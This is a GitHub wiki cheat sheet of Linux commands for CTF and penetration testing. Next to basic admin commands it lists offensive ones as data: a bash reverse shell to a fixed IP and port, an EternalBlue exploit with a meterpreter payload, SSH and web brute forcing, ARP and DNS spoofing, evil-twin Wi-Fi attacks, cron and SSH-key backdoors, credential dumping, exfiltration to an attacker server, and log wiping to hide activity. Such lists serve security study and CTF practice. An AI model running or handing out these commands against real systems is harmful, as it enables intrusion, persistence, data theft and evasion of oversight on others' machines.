Linux CTF cods - taylorjohn/hacking GitHub Wiki
Print working directory
pwd
/root
List subdirectories
ls
Desktop Downloads Documents Photos
List subdirectories plus all files, including hidden ones
ls -la
Clear the screen
clear
Change directory
cd Desktop
~/Desktop#
Go back directories
cd ..
cd ../../
cd ../../../
Create a file
touch filename.txt
~/Desktop
ls
filename.txt
Remove a file
rm filename.txt
ls
Make a directory folder
mkdir Kali
ls
Kali
Remove directory recursively
rm Kali -r
ls
Who is the current user
whoami
/root
Create and write a file using nano editor
nano worm.py
Show IP configuration
ifconfig
Check network status
netstat -tuln
Check listening ports and open connections
ss -tuln
Scan local network for hosts
nmap -sn 192.168.1.0/24
Find all files with a specific name
find / -name "filename.txt"
Show system kernel version
uname -r
Display disk usage
df -h
View processes running on the system
ps aux
Search for a file pattern in the system
grep -r 'pattern' /path/to/search
Show routing table
route -n
Show active connections and listening ports
netstat -anp
Check available disk space on a specific partition
df -h /dev/sda1
Show information about the CPU
lscpu
Show hardware details
lshw
Show the last logged-in users
Show active network interfaces
ip link show
Display running services and their statuses
systemctl list-units --type=service
Check for users with superuser privileges
sudo grep -i 'sudo' /etc/group
Show system logs
journalctl
View network connections with detailed information
netstat -tulnp
Start a reverse shell (assuming the attacker’s IP is 192.168.1.10 and port is 4444)
bash -i >& /dev/tcp/192.168.1.10/4444 0>&1
View Disk Usage by Folder
du -sh *
Monitor Log Files in Real-Time
tail -f /var/log/syslog
Extract Tar Files
tar -xzvf file.tar.gz
Compress Files to Tar
tar -czvf archive.tar.gz /path/to/folder
Display System Uptime
uptime
Show Memory Usage
free -h
List Currently Mounted File Systems
mount | column -t
Schedule a Command to Run Later
echo "command" | at now + 5 minutes
Display File Permissions in Octal Format
stat -c "%a %n" /path/to/file
Display the Last 10 Lines of a File
tail -n 10 /path/to/file
Create a Symbolic Link
ln -s /path/to/file /path/to/symlink
Show open files by processes
lsof
Check running services and open ports
nmap -sV localhost
Set up a simple web server
python3 -m http.server 8080
Packet capture with tcpdump
tcpdump -i eth0
Dump network traffic to a file
tcpdump -w capture.pcap
Analyze pcap file with tshark
tshark -r capture.pcap
Brute force login attempts with Hydra (example for SSH)
hydra -l username -P /path/to/passwords.txt ssh://target-ip
Scan for vulnerable services with OpenVAS
openvas -u -s
SQL injection testing with sqlmap
sqlmap -u http://target-url --dbs
Network scanning and exploitation with Metasploit
msfconsole
In msfconsole:
use auxiliary/scanner/portscan/tcp
set RHOSTS target-ip
run
Exploit a known vulnerability
msfconsole
In msfconsole:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target-ip
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST your-ip
run
Crack hashed passwords with John the Ripper
john /path/to/hashfile --wordlist=/path/to/wordlist
Automate network penetration testing with AutoRecon
autorecon target-ip
Interactive Python Shell for one-liners
python3 -c 'import pty; pty.spawn("/bin/bash")'
Start a netcat listener for reverse shells
nc -lvnp 4444
Upload file to a remote host using SCP
scp localfile.txt user@remote-host:/remote/directory
Download file from a remote host using SCP
scp user@remote-host:/remote/file.txt /local/directory
Brute force SSH login with Hydra
hydra -l root -P /path/to/passwords.txt ssh://target-ip
Bypass restrictive firewall rules with proxychains
proxychains nmap -sT target-ip
Web application security testing with Burp Suite
Start Burp Suite and configure browser proxy settings to use it
Check for subdomains with Sublist3r
sublist3r -d example.com
Enumerate domain user information using rpcclient
rpcclient -U "" target-ip
Look for hidden paths with dirb
dirb http://target-url /path/to/wordlist
Extract email addresses and subdomains from a URL
theharvester -d example.com -l 500 -b all
Detect SQL injection vulnerabilities with sqlmap
sqlmap -u http://target-url --batch --dbs
Launch cross-site scripting (XSS) attacks with XSSer
xsser -u "http://target-url"
Enumerate SMB shares with smbclient
smbclient -L \target-ip
Search for sensitive files with grep
grep -rnw '/path/to/search' -e 'password'
DNS enumeration with dnsenum
dnsenum example.com
Port scan with Unicornscan
unicornscan -i eth0 -msf target-ip
Automate penetration testing tasks with Metasploit
msfconsole -r /path/to/resource/file.rc
Windows privilege escalation enumeration with PowerUp
Copy PowerUp.ps1 to target and run:
powershell -ExecutionPolicy Bypass -File .\PowerUp.ps1
Test for XSS vulnerabilities with XSStrike
xsstrike -u http://target-url
Buffer overflow exploit development with Immunity Debugger
Load the vulnerable application in Immunity Debugger and set a breakpoint
Analyze executable files with radare2
r2 /path/to/executable
List all block devices (disks, partitions, etc.)
lsblk
List disk partitions
fdisk -l
Display disk usage for each mounted filesystem
df -h
Show detailed information about USB devices
lsusb
Show detailed information about PCI devices
lspci
Check the filesystem type of a device or partition
blkid
Display S.M.A.R.T. status of a disk
smartctl -H /dev/sda
Monitor S.M.A.R.T. attributes of a disk
smartctl -A /dev/sda
Clone a disk with dd
dd if=/dev/source-disk of=/dev/destination-disk bs=4M
Create a new partition table on a disk
parted /dev/sda mklabel gpt
Create a new partition with parted
parted /dev/sda mkpart primary ext4 1MiB 100%
Format a partition to ext4 filesystem
mkfs.ext4 /dev/sda1
Mount a partition
mount /dev/sda1 /mnt
Unmount a partition
umount /mnt
Check and repair a filesystem with fsck
fsck /dev/sda1
Test disk speed and latency with hdparm
hdparm -tT /dev/sda
Test write speed to a partition with dd
dd if=/dev/zero of=/mnt/testfile bs=1M count=1000
List all currently mounted filesystems
mount | column -t
Check free space on all mounted partitions
df -h
Monitor disk I/O usage in real time
iotop
Find large files on disk
find / -type f -size +100M -exec ls -lh {} ;
Scan for new SCSI devices (like newly attached USB drives)
echo "- - -" > /sys/class/scsi_host/host0/scan
Get a summary of disk usage per directory
du -sh /*
Check Kernel Version and Distro
uname -a cat /etc/os-release
List Installed Packages
dpkg -l | grep package_name # Debian-based systems rpm -qa | grep package_name # RPM-based systems
Find SUID Binaries
find / -perm -4000 -type f 2>/dev/null
List All Users
cat /etc/passwd
Check for Weak File Permissions
find / -type f -perm -o+w 2>/dev/null
Check for Writable Directories in $PATH
echo $PATH | tr ':' '\n' | xargs -I {} find {} -writable -type d 2>/dev/null
View Scheduled Cron Jobs
crontab -l ls -l /etc/cron*
Exploit SUID Binaries
Example: Running a shell with the SUID bit set
/usr/bin/sudo /bin/sh
Exploit Writable Directories in $PATH
Replace a binary in a writable directory
echo "echo hacked" > /tmp/hack.sh chmod +x /tmp/hack.sh export PATH=/tmp:$PATH
Now, if a program uses a binary in this path, it will run our malicious script
Privilege Escalation with GTFOBins
Example: Find all potential methods
Use the GTFOBins website to find potential escalation paths for specific binaries
Check for Insecure Capabilities
getcap -r / 2>/dev/null
Kernel Exploit Tools
Example: Using linux-exploit-suggester
wget https://example.com/linux-exploit-suggester.sh chmod +x linux-exploit-suggester.sh ./linux-exploit-suggester.sh
Escalate via NFS Mounts
showmount -e target-ip mount -t nfs target-ip:/share /mnt
Linux commands and tools for enumeration:
System Information
# Kernel version and architecture
uname -a
# Distro information
cat /etc/os-release
# Environment variables
env
# Logged-in users
who -a
w
Network Information
# Network interfaces and IP addresses
ip a
# Active network connections
netstat -tuln
ss -tuln
# Routing table
route -n
# DNS server information
cat /etc/resolv.conf
# Check available network services
nmap -sV localhost
# List open ports and services
lsof -i -P -n
User and Group Information
# List all users
cat /etc/passwd
# List all groups
cat /etc/group
# Check sudo privileges
sudo -l
# List recent logins
last
File System Enumeration
# Mounted file systems and disk usage
df -h
# List files and directories with permissions
ls -al /path/to/dir
# Find all files modified within the last day
find / -type f -mtime -1
# Find world-writable files
find / -perm -o+w 2>/dev/null
# Find files with specific permissions
find / -perm 4000 2>/dev/null # SUID
Process Information
# List running processes
ps aux
# List processes with specific privileges
ps -ef | grep root
# Check cron jobs
crontab -l ls -l /etc/cron*
### Installed Software and Services
bash
List installed packages
dpkg -l # Debian-based systems rpm -qa # RPM-based systems
List active services
systemctl list-units --type=service
Check for web servers
curl -I http://localhost
### System Configuration
```bash
# List kernel modules
lsmod
# List capabilities
getcap -r / 2>/dev/null
# Firewall rules
iptables -L
# List active SELinux policies
sestatus
Tools for Advanced Enumeration
bash
LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh chmod +x LinEnum.sh ./LinEnum.sh
Linux Exploit Suggester
wget https://github.com/mzet-/linux-exploit-suggester/archive/master.zip unzip master.zip chmod +x linux-exploit-suggester-master/linux-exploit-suggester.sh ./linux-exploit-suggester-master/linux-exploit-suggester.sh
Check for sudo vulnerabilities
sudo -l
Web Application Security Commands
SQL Injection (SQLi)
# Test for SQL injection vulnerabilities using SQLmap
sqlmap -u "http://target-url/page?id=1" --dbs
# Retrieve database tables via SQL injection
sqlmap -u "http://target-url/page?id=1" -D database_name --tables
Cross-Site Scripting (XSS)
# Test for XSS vulnerabilities using XSStrike
xsstrike -u "http://target-url"
# Find XSS vulnerabilities using Burp Suite
# Set up Burp Proxy and use the scanner to detect XSS
Cross-Site Request Forgery (CSRF)
# Use Burp Suite to generate CSRF proof-of-concept
# Intercept a CSRF-prone request and right-click to generate CSRF POC
# Use OWASP ZAP to find CSRF vulnerabilities
zap-cli active-scan --url "http://target-url"
File Inclusion
# Check for LFI/RFI vulnerabilities
# Manually manipulate the file path parameter
curl "http://target-url?page=/etc/passwd"
# Automated scan for file inclusion vulnerabilities
dirsearch -u "http://target-url" -e .php,.asp,.jsp,.html,.htm,.pl,.cgi -w wordlist.txt
Directory Traversal
# Test for directory traversal vulnerabilities manually
curl "http://target-url/../../../../etc/passwd"
# Automated scan for directory traversal vulnerabilities
dirsearch -u "http://target-url" -e .php,.asp,.jsp,.html,.htm,.pl,.cgi -w wordlist.txt
Server-Side Request Forgery (SSRF)
# Test SSRF vulnerabilities with SSRFmap
ssrfmap -u "http://target-url/redirect?url=http://internal-service"
# Exploit SSRF manually
curl "http://target-url/redirect?url=http://internal-service"
Insecure Direct Object References (IDOR)
# Use Burp Suite to manually test for IDOR
# Monitor requests and attempt to change object IDs
# Use Wfuzz to fuzz object IDs
wfuzz -c -z range,1-100 -u "http://target-url/user?id=FUZZ"
Authentication and Authorization Issues
# Brute force login page with Hydra
hydra -l admin -P /path/to/passwords.txt "http://target-url/login"
# Use Burp Suite to fuzz session management vulnerabilities
# Utilize Intruder to fuzz session tokens
Security Misconfigurations
# Scan for known vulnerabilities and misconfigurations using Nikto
nikto -host http://target-url
# Detect web server misconfigurations with Nmap
nmap --script http-config-check -p 80,443 target-url
Network Security Commands
Network Scanning
# Scan a network for live hosts with Nmap
nmap -sn 192.168.1.0/24
# Perform a stealth scan to detect open ports
nmap -sS -p 1-65535 target-ip
# Run a service version scan to identify services on open ports
nmap -sV -p 80,443 target-ip
Network Sniffing
# Capture network traffic on an interface using tcpdump
tcpdump -i eth0 -w capture.pcap
# Analyze network traffic using Wireshark
wireshark capture.pcap
Spoofing and Sniffing Attacks
# Perform ARP spoofing with Ettercap
ettercap -T -q -i eth0 -M arp:remote /target-ip// /gateway-ip//
# DNS spoofing with dnsspoof
dnsspoof -i eth0
Man-in-the-Middle (MITM) Attacks
# Perform a Man-in-the-Middle attack using Bettercap
bettercap -iface eth0
# Intercept HTTPS traffic using SSLstrip
sslstrip -l 8080
Wireless Network Security
# Discover Wi-Fi networks using airmon-ng and airodump-ng
airmon-ng start wlan0
airodump-ng wlan0mon
# Deauthenticate a Wi-Fi client using aireplay-ng
aireplay-ng -0 10 -a ap-mac -c client-mac wlan0mon
# Crack WPA/WPA2 passphrases with Aircrack-ng
aircrack-ng -w /path/to/wordlist capture.cap
DNS Attacks
# DNS enumeration using dnsenum
dnsenum example.com
# Perform DNS poisoning with Ettercap
ettercap -T -q -i eth0 -M dns_spoof /target-ip// /gateway-ip//
Network Pentesting Frameworks
# Metasploit Framework for network-based attacks
msfconsole
# Use Metasploit to scan for vulnerabilities
use auxiliary/scanner/portscan/tcp
set RHOSTS target-ip
run
# Crack passwords with Hydra
hydra -l username -P /path/to/passwords.txt target-ip ssh
Wireless Security Commands
Network Scanning and Monitoring
# Start the network interface in monitor mode
airmon-ng start wlan0
# Discover nearby Wi-Fi networks using airodump-ng
airodump-ng wlan0mon
# Capture packets for a specific network
airodump-ng -c channel --bssid target-bssid -w capture wlan0mon
Packet Injection and Deauthentication Attacks
# Deauthenticate a Wi-Fi client from an AP using aireplay-ng
aireplay-ng -0 10 -a ap-bssid -c client-mac wlan0mon
# Perform a fake authentication with an AP using aireplay-ng
aireplay-ng -1 0 -e network-name -a ap-bssid wlan0mon
WPA/WPA2 Cracking
# Capture WPA/WPA2 handshake with airodump-ng
airodump-ng --bssid target-bssid -c channel -w handshake wlan0mon
# Crack WPA/WPA2 passphrase using Aircrack-ng and a wordlist
aircrack-ng -w /path/to/wordlist handshake.cap
# Crack WPA/WPA2 passphrase using hashcat
hashcat -m 2500 handshake.hccapx /path/to/wordlist
Rogue Access Points and Evil Twin Attacks
# Set up a rogue AP with airbase-ng
airbase-ng -e "FakeAP" -c channel wlan0mon
# Start a DHCP server for the rogue AP
dnsmasq -C /path/to/dnsmasq.conf
# Redirect traffic to your machine using iptables
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
# Conduct a captive portal attack using Wifiphisher
wifiphisher --essid "FakeAP"
WEP Cracking
# Capture packets from a WEP network using airodump-ng
airodump-ng --bssid target-bssid -c channel -w wep-capture wlan0mon
# Crack WEP passphrase using Aircrack-ng
aircrack-ng -b target-bssid wep-capture*.cap
# Inject packets into the WEP network using aireplay-ng
aireplay-ng -3 -b target-bssid wlan0mon
Wireless Security Auditing Frameworks
# Wifite for automated wireless network attacks
wifite
# Kismet for wireless network discovery
kismet -c wlan0
# Fern Wi-Fi Cracker for GUI-based wireless auditing
fern-wifi-cracker
Post-Exploitation Commands
Privilege Escalation
# Search for SUID binaries that can be exploited
find / -perm -4000 -type f 2>/dev/null
# Search for writable directories in $PATH
echo $PATH | tr ':' '\n' | xargs -I {} find {} -writable -type d 2>/dev/null
# Enumerate potential privilege escalation vulnerabilities using LinPEAS
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Persistence
# Create a new user with root privileges
useradd -m -G sudo -s /bin/bash username
echo 'username:password' | chpasswd
# Add a new cron job to maintain access
echo '* * * * * root /path/to/backdoor' >> /etc/crontab
# Create a backdoor by adding a reverse shell to the authorized keys
echo 'ssh-rsa AAAA... reverse-shell-key' >> ~/.ssh/authorized_keys
# Set up a netcat listener to receive a reverse shell
nc -lvnp 4444
Credential Dumping
# Extract password hashes from /etc/shadow (requires root)
cat /etc/shadow
# Use Mimikatz to dump credentials on a Windows machine
mimikatz.exe
# In Mimikatz:
sekurlsa::logonpasswords
# Dump cached Windows credentials with LaZagne
lazagne.exe all -v
Data Exfiltration
# Use tar to compress and hide data for exfiltration
tar czf - /sensitive/data | openssl enc -aes-256-cbc -e -out data.enc
# Use SCP to exfiltrate data to a remote server
scp /path/to/data user@remote-ip:/destination
# Exfiltrate data over DNS using dns2tcp
dns2tcpc -z data.enc -r dns-server -h attacker-server
Lateral Movement
# Use SSH to connect to other machines on the network
ssh user@target-ip
# Use SMBclient to browse Windows shares
smbclient -L \\target-ip\\ -U username
# Utilize Metasploit modules for lateral movement
msfconsole
# In msfconsole:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target-ip
run
Covering Tracks
# Clear bash history
history -c && history -w
# Remove logs related to your activity
echo > /var/log/auth.log
echo > /var/log/syslog
# Delete specific log entries
sed -i '/suspicious-pattern/d' /var/log/auth.log
Cryptography Commands
Hashing and Hash Cracking
# Generate MD5 hash of a file
md5sum file.txt
# Generate SHA-256 hash of a file
sha256sum file.txt
# Crack MD5 hashes with John the Ripper
john --wordlist=/path/to/wordlist.txt --format=raw-md5 hashes.txt
# Crack SHA-256 hashes with hashcat
hashcat -m 1400 hashes.txt /path/to/wordlist.txt
Symmetric Encryption and Decryption
# Encrypt a file with OpenSSL using AES-256
openssl enc -aes-256-cbc -salt -in plaintext.txt -out encrypted.bin
# Decrypt a file with OpenSSL using AES-256
openssl enc -aes-256-cbc -d -in encrypted.bin -out decrypted.txt
# Encrypt a file using GPG
gpg -c plaintext.txt
# Decrypt a file using GPG
gpg -d plaintext.txt.gpg
Public Key Cryptography
# Generate an RSA key pair using OpenSSL
openssl genpkey -algorithm RSA -out private_key.pem -aes256
openssl rsa -pubout -in private_key.pem -out public_key.pem
# Encrypt a file using a public key
openssl rsautl -encrypt -inkey public_key.pem -pubin -in plaintext.txt -out encrypted.txt
# Decrypt a file using a private key
openssl rsautl -decrypt -inkey private_key.pem -in encrypted.txt -out decrypted.txt
# Sign a file with a private key
openssl dgst -sha256 -sign private_key.pem -out signature.bin plaintext.txt
# Verify a signature with a public key
openssl dgst -sha256 -verify public_key.pem -signature signature.bin plaintext.txt
Steganography
# Embed data in an image using steghide
steghide embed -cf image.jpg -ef secret.txt
# Extract hidden data from an image using steghide
steghide extract -sf image.jpg
# Detect potential hidden data in an image using zsteg
zsteg image.png
Secure Communication
# Set up a secure communication channel using GPG
# Generate a new key pair
gpg --gen-key
# Export public key to send to others
gpg --export -a "User Name" > public_key.asc
# Encrypt a message to someone using their public key
gpg -e -r "Recipient Name" message.txt
# Decrypt a message using your private key
gpg -d message.txt.gpg
Password Management
# Generate a strong password using OpenSSL
openssl rand -base64 12
# Encrypt and store passwords securely with KeePass
keepassxc
Forensics Commands
File System Analysis
# Analyze disk images with The Sleuth Kit (TSK)
fls -r -o offset image.dd
# Retrieve files from a disk image
icat -o offset image.dd inode_number > output_file
# Mount a disk image for analysis
mount -o loop,ro,noexec image.dd /mnt/disk_image
# Analyze disk partitions with fdisk
fdisk -l image.dd
Memory Forensics
# Analyze memory dumps using Volatility
volatility -f memory_dump.raw --profile=Win7SP1x64 pslist
# Extract files from memory dump using Volatility
volatility -f memory_dump.raw --profile=Win7SP1x64 filescan
# Analyze network connections from a memory dump
volatility -f memory_dump.raw --profile=Win7SP1x64 netscan
Log Analysis
# Search system logs for specific events
grep 'event' /var/log/syslog
# Extract relevant log entries by date range
sed -n '/start-date/,/end-date/p' /var/log/syslog
# Analyze Windows event logs with Log Parser
logparser.exe -i:evt "SELECT * FROM security.evt WHERE EventID = 4624"
Timeline Analysis
# Create a timeline of file system events with The Sleuth Kit
mactime -b bodyfile.txt > timeline.txt
# Generate a timeline from log files
log2timeline.py output.plaso /path/to/logfiles
# Create a graphical timeline with Timesketch
timesketch-importer --index_name case_name timeline_file.csv
Network Forensics
# Capture network traffic with tcpdump
tcpdump -i eth0 -w capture.pcap
# Analyze captured network traffic using Wireshark
wireshark capture.pcap
# Reassemble files from captured network traffic with NetworkMiner
networkminer -r capture.pcap
Email Forensics
# Extract email headers using Mboxgrep
mboxgrep --headers filename.mbox
# Analyze email headers for spoofing attempts
python mail-parser.py email.eml
Image and File Forensics
# Extract metadata from an image using ExifTool
exiftool image.jpg
# Recover deleted files with Photorec
photorec /log /d /output/directory /path/to/disk_image
# Analyze file signatures with binwalk
binwalk -e file.bin
CTF Commands
Web Exploitation
# Find hidden directories and files on a website with Dirb
dirb http://target-url /path/to/wordlist
# Check for SQL injection vulnerabilities with SQLmap
sqlmap -u "http://target-url/page?id=1" --dbs
# Test for XSS vulnerabilities with XSStrike
xsstrike -u "http://target-url"
Reverse Engineering
# Analyze binary files with Ghidra
ghidraRun
# Disassemble and debug binaries with Radare2
r2 -A binary_file
# Debug binaries with GDB
gdb binary_file
# In GDB:
break main
run
Cryptography
# Decode Base64 encoded strings
echo "base64string" | base64 --decode
# Crack hashed passwords with John the Ripper
john --wordlist=/path/to/wordlist.txt hashes.txt
# Encrypt and decrypt files with OpenSSL
openssl enc -aes-256-cbc -in plaintext.txt -out encrypted.bin
openssl enc -aes-256-cbc -d -in encrypted.bin -out decrypted.txt
Steganography
# Extract hidden data from images using Steghide
steghide extract -sf image.jpg
# Analyze image files for hidden content using zsteg
zsteg image.png
# Check audio files for hidden data with StegoVeritas
stegoveritas audiofile.wav
Forensics
# Analyze memory dumps with Volatility
volatility -f memory_dump.raw --profile=Win7SP1x64 pslist
# Extract files from a disk image using The Sleuth Kit
icat -o offset image.dd inode_number > output_file
# Extract metadata from files using ExifTool
exiftool file.jpg
Networking
# Capture network traffic with tcpdump
tcpdump -i eth0 -w capture.pcap
# Analyze captured network traffic using Wireshark
wireshark capture.pcap
# Scan a network for open ports with Nmap
nmap -sS -p 1-65535 target-ip
Privilege Escalation
# Enumerate potential privilege escalation vectors with LinPEAS
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
# Check for writable directories in the $PATH
echo $PATH | tr ':' '\n' | xargs -I {} find {} -writable -type d 2>/dev/null
# Check for SUID binaries
find / -perm -4000 -type f 2>/dev/null
Here are some less common and more advanced commands for Capture the Flag (CTF) competitions:
Advanced CTF Commands
Web Exploitation
# Use Burp Suite's Collaborator for detecting SSRF, Blind XSS, and other vulnerabilities
# Configure Burp Suite to use the Collaborator client and monitor for interactions
# Detect Java deserialization vulnerabilities with ysoserial
java -jar ysoserial.jar CommonsCollections5 "echo vulnerable" | base64
# Inject the payload into a vulnerable application
# Test GraphQL endpoints for vulnerabilities with GraphQLmap
graphqlmap -u "http://target-url/graphql" -H "Auth-Token: token-value"
Reverse Engineering
# Use Binwalk to analyze binary files for hidden content
binwalk -e file.bin
# Decompile Java bytecode with JD-GUI
jd-gui binary.jar
# Analyze ARM binaries using Radare2
r2 -A binary.arm
# In Radare2:
aaa
afl
pdf @ main
Cryptography
# Use CyberChef for advanced cryptographic analysis and encoding/decoding
# Access CyberChef via the web or download the standalone version
cyberchef
# Decrypt RSA with common modulus attacks using RsaCtfTool
python3 RsaCtfTool.py --publickey public_key.pem --uncipherfile encrypted.bin
# Perform frequency analysis on ciphertext using Python
python -c "import collections; text = open('cipher.txt').read(); print(collections.Counter(text))"
Steganography
# Analyze bitmap image files for hidden messages using stegsolve
stegsolve.jar
# Analyze audio files with Audacity to reveal hidden messages
# Open the file in Audacity and inspect spectrogram and waveform views
# Use OutGuess to detect hidden messages in JPEG images
outguess -r image.jpg secret.txt
Forensics
# Extract deleted files from a disk image using PhotoRec
photorec image.dd
# Perform malware analysis in a virtualized environment
# Set up a Windows VM with network isolation
# Analyze malware samples with tools like PE Studio and Process Monitor
# Use Bulk Extractor to extract useful information from disk images
bulk_extractor -o output image.dd
Networking
# Perform ARP spoofing with Bettercap
bettercap -iface eth0
# In Bettercap:
net.probe on
set arp.spoof.targets target-ip
arp.spoof on
# Extract network credentials from a packet capture with Pcredz
pcredz -f capture.pcap
# Use Tshark to filter specific network packets
tshark -r capture.pcap -Y "ip.src==target-ip"
Privilege Escalation
# Exploit misconfigured sudo rights using GTFOBins
# Find the binary with misconfigured sudo rights and execute an exploit based on GTFOBins guidelines
# Escape Docker containers using misconfigured capabilities
# Use capabilities like SYS_ADMIN to escape to the host system
# Detect weak sudoers configurations with Sudoers Scanner
sudoers-scanner --scan --show-paths
Running Programs with ./
Running Executables
# Make a script or binary executable
chmod +x script.sh
# Execute the script or binary from the current directory
./script.sh
# Pass arguments to the executable
./program --option argument
# Run an executable with elevated privileges
sudo ./program
Troubleshooting Execution Issues
# Check the architecture of the binary to ensure compatibility
file program
# Check for required shared libraries
ldd program
# Verify interpreter is installed for scripts (like Bash or Python)
head -n 1 script.sh
# Ensure the correct interpreter is available: /bin/bash, /usr/bin/python3, etc.
Unix/Linux Permissions Symbols
Permission Symbols
# Example file permissions: -rwxr-xr--
# First character: file type
- # Regular file
d # Directory
l # Symbolic link
# Next three characters: owner's permissions
r # Read permission for owner
w # Write permission for owner
x # Execute permission for owner
# Next three characters: group's permissions
r # Read permission for group
- # No write permission for group
x # Execute permission for group
# Last three characters: others' permissions
r # Read permission for others
- # No write permission for others
- # No execute permission for others
Changing Permissions
# Change permissions using symbolic mode
chmod u+rwx,g+rx,o+r file.txt
# Change permissions using octal mode
chmod 755 file.txt
# Breakdown: 7 (owner) = rwx, 5 (group) = r-x, 5 (others) = r-x
# Change ownership of a file
chown username:groupname file.txt
# Change permissions recursively on a directory
chmod -R 755 /path/to/directory
Special Permissions
# Set SUID (Set User ID) on a binary
chmod u+s program
# Execute the binary as the owner, not the user executing it
# Set SGID (Set Group ID) on a directory
chmod g+s /path/to/directory
# New files inherit the group's permissions
# Set Sticky Bit on a directory
chmod +t /path/to/directory
# Only the owner can delete files in the directory
Searching for Passwords and Sensitive Information
Using grep
# Search for specific keywords in files recursively
grep -ri "password" /path/to/directory
# Search for common password patterns (e.g., `password=`, `passwd:`) ignoring case
grep -ri "password=" /path/to/directory
grep -ri "passwd:" /path/to/directory
# Search for sensitive keywords excluding specific file types (e.g., images)
grep -r --exclude=*.{jpg,png} "password" /path/to/directory
# Search for Base64 encoded strings which might contain sensitive data
grep -ri "==\|==" /path/to/directory
# Search for sensitive information in files using regex patterns
grep -Eri "(password|passwd|pwd|credentials|api_key|secret|token|key)" /path/to/directory
Using find
# Find files by name that may contain sensitive information
find / -iname "*passwd*" 2>/dev/null
find / -iname "*password*" 2>/dev/null
# Find files based on their extension (e.g., `.txt`, `.conf`)
find / -iname "*.conf" 2>/dev/null
# Find files modified in the last N days that could contain recent sensitive information
find / -mtime -7 -iname "*conf*" 2>/dev/null
# Find files based on permissions (e.g., world-readable files)
find / -perm -o+r 2>/dev/null
# Find all writable files by the current user
find / -writable -type f 2>/dev/null
Combining grep and find
# Find all readable files and search for sensitive keywords inside them
find / -type f -perm -o+r 2>/dev/null -exec grep -Hi "password" {} \;
# Find all recently modified files and search for sensitive data
find / -mtime -7 -type f 2>/dev/null -exec grep -HiE "(password|passwd|secret)" {} \;
# Find files by name pattern and search for sensitive data
find / -iname "*conf*" 2>/dev/null -exec grep -Hi "password" {} \;
Advanced Techniques
# Find and extract strings in binary files that might contain passwords
strings /path/to/binary | grep -i "password"
# Use John the Ripper to check if any hashed passwords in a file can be cracked
john /path/to/hashfile
# Use the tool `ripgrep` (rg) for faster search in large directories
rg -i "password|passwd|api_key" /path/to/directory